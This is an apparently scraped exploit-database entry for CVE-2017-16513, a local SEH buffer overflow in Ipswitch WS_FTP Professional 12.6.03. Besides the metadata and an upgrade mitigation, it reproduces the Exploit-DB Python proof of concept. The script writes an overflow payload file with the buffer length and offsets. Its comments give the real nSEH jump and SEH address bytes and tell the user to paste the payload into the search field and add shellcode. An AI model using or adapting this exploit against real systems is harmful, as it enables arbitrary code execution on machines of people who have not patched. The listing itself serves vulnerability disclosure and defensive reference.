header-logo
Suggest Exploit
vendor:
WS_FTP Professional
by:
Kevin McGuigan
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: WS_FTP Professional
Affected Version From: 12.6.03
Affected Version To: 12.6.03
Patch Exists: YES
Related CWE: CVE-2017-16513
CPE: a:ipswitch:ws_ftp_professional
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 32-bit
2017

Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)

A buffer overflow vulnerability exists in Ipswitch WS_FTP Professional version 12.6.03. An attacker can exploit this vulnerability by sending a specially crafted payload to the search field, which can be used to overwrite the SEH and execute arbitrary code. The payload can be generated using a script, and the shellcode can be replaced with 'Ds' in the search field.

Mitigation:

Upgrade to the latest version of Ipswitch WS_FTP Professional.
Source

Exploit-DB raw data:

#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)
#Author: Kevin McGuigan. Twitter: @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#Date: 03/11/2017
#Version: 12.6.03
#CVE: CVE-2017-16513
#Tested on: Windows 7 32-bit
#Use script to generate payload. Paste payload into search field, replace Ds with shellcode. 
#nSEH = "\x74\x08\x90\x90" 
#SEH = "\x31\x2D\x91\x23"

buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4


f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()

Navigation

Suggest Exploit

Services By CQR